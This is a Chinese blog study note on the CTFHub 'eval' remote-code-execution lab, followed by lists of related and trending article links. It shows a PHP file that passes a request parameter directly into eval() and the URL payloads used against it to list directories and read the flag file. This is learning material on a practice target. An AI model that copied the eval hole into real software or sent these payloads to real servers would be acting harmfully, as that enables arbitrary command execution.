CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
摇滚侠9 小时前
如何选择 nodejs 版本,nodejs 版本号详解
学习
醇氧9 小时前
【学习】IP地址:数字世界的“门牌号”怎么读?
网络协议·学习·tcp/ip
talen_hx29610 小时前
《零基础入门Spark》学习笔记 Day 11
笔记·学习·spark
ZhiqianXia11 小时前
gem5 模拟器学习笔记(1):核心术语整理
笔记·学习
GHL28427109011 小时前
MCP学习
学习·ai
凌波粒12 小时前
D2L学习笔记:安装、张量与数据处理
笔记·python·学习·pandas
chools12 小时前
Java后端拥抱AI开发之个人学习路线 - - Spring AI【第一期】
java·人工智能·学习·spring·ai
忙什么果13 小时前
transformer学习笔记2
笔记·学习·transformer
ZhiqianXia13 小时前
Gem5 学习笔记(2) : Gem5 建模要点与基本思路
笔记·学习
热门推荐
01GitHub 镜像站点022026年3月AI领域大事件:DeepSeek引领开源风暴03Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05UV安装并设置国内源06如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解07让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南08AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南09深扒 Claude Code Buddy 模式:一只仙人掌背后的确定性随机算法10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)